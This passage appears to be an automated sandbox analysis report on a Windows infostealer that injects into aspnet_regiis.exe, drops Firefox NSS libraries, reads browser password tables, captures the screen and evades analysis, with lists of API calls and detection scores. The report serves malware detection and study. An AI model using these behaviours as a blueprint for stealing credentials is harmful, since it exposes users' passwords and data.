                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/VxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
                        Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: aspnet_regiis.exe, 00000002.00000003.1787303428.000000002913A000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: aspnet_regiis.exe, 00000002.00000003.1787303428.000000002913A000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02765700 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

                        System Summary

                        barindex
                        PE file contains section with special chars
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: section name: A7B&<U
                        PE file has nameless sections
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: section name:
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC22630 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2CED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C30B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C30B8C0 rand_s,NtQueryVirtualMemory,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C30B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2AF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC211C0
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC22630
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC22FB0
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC22C50
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC35465
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC21000
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: 0_2_6CC29A80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2A35A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C31542B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C31AC00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2E5C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2F2C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2B5440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C31545C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3034A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C30C4A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2B6C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2AD4E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2E6CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2B64C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2CD4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2BFD00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2CED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2D0512
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3085F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2E0DD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C309E30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2F5600
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2E7E10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C316E63
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2AC670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2F2E4E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2C4640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2C9E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2E3E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C304EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C30E680
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2C5E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3176E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2ABEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2BFEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2B9F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2E7710
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2F77A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2ADFE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2D6FF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2EB820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2F4820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2B7810
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2EF070
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2C8850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2CD850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2D60A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2CC0E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2E58E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3150C7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C31B170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2BD960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2FB970
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2CA940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2AC9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2DD9B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C302990
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2E5190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2E9A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C312AB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2A22A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2D4AA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2BCAB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C31BA90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2C1AF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2EE2F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2E8AC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2ED320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2BC370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2A5340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C2AF380
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3153C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C416C00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C35AC60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C42AC30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3AECD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C34ECC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C47AD50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C41ED70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C4D8D20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C354DB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C4DCDC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3E6D90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3EEE70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C430E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3D6E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C35AEC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3F0EC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C356F10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C412F70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C490F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3BEF40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C35EFB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C42EFF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C350FE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C498FB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C424840
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3A0820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3DA820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C4568E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3A6900
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C388960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3E09A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C46C9E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3849F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C40A9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C4109B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3FEA00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3CCA70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C408A30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3CEA80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3F0BA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C456BE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3DA430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C3B4420
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6C4DDAE0 appears 31 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 027543B0 appears 316 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6C2E94D0 appears 90 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6C2DCBE8 appears 134 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 6C4D09D0 appears 121 times
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeCode function: String function: 6CC2A9F0 appears 33 times
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe, 00000000.00000000.1679333257.00000000007C8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAMD69317154114.exeX vs f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeBinary or memory string: OriginalFilenameAMD69317154114.exeX vs f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic PE information: Section: A7B&<U ZLIB complexity 0.9998899647887324
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/23@0/1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_6C307030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02765CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeFile created: C:\Users\user\AppData\Roaming\d3d9.dllJump to behavior
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: AFIIEBGCAAECBGCBGCBK.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeReversingLabs: Detection: 37%
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeVirustotal: Detection: 34%
                        Source: unknownProcess created: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe "C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe"
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exeSection loaded: kernel.appcore.dll
